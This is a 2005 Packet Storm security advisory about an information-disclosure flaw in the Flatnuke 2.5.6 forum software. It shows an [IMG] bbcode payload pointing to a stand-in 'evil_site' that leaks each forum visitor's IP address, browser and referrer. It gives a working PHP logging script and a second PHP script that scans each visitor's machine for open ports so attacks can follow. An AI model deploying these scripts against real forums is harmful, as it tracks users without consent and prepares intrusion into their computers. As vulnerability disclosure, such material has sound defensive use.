flat256enENa2.txt

2005-09-01T00:00:00
ID PACKETSTORM:39757
Type packetstorm
Reporter rgod
Modified 2005-09-01T00:00:00

Description

                                        
                                            `Flatnuke 2.5.6 enENa2 (possibly prior versions) user IP address /  
information disclosure  
  
software:  
site: http://flatnuke.sourceforge.net/flatnuke/  
download link: http://itk.hopto.org:666/work/index.php?mod=Download&dlfile=FlatNuke_En/FlatNukeEn_2.5.6_a2.zip&mode=go  
  
same vuln of simple machine forum, information disclosure:  
a user can use [IMG] bbcode in messages  
  
[IMG]http://[evil_site]/image.php[/IMG]  
  
where image.php is a file like this:  
  
<?php  
$log="log".date("Ymd").".txt";  
$fp=fopen($log,'a');  
fputs($fp,$REMOTE_ADDR.":".$REMOTE_PORT." - ".$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRING."-".$HTTP_ACCEPT_LANGUAGE."-".$REQUEST_URI."\r\n");  
fclose($fp)  
?>  
  
When forum users view a page that should show the image, a new line is appended  
to log[date].txt on [evil_site] server, like this:  
  
08.31.05 04.09 - 192.168.1.1:8562 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-http://[target]/[path]/[page]-GET--it-/image.php  
  
so an external user can monitor in details the forum activity, user ip addresses,  
have informations on OS and browsers used and so on  
  
the evil script could check for open ports/services on target machines to send  
them exploit code or proxies, trojan ports, do some other stuff, just an example:  
  
<?php  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout", 1);  
$log="log".date("Ymd").".txt";  
$fp=fopen($log,'a');  
fputs($fp,'open ports on '.$REMOTE_ADDR.": ");  
$portlist="23;135;139;445;1080;3128;8080;12345";  
$ports=explode(";",$portlist);  
for ($i=0; $i<=count($ports)-1; $i++)  
{  
$ock=fsockopen($REMOTE_ADDR,$ports[$i]);  
if ($ock) {fputs($fp,$ports[$i].' '); fclose($ock);}  
}  
fputs($fp,"\r\n");  
fclose($fp);  
//then a lot of creativity ;)  
?>  
  
  
rgod  
site: http://rgod.altervista.org  
mail: retrogod@aliceposta.it  
`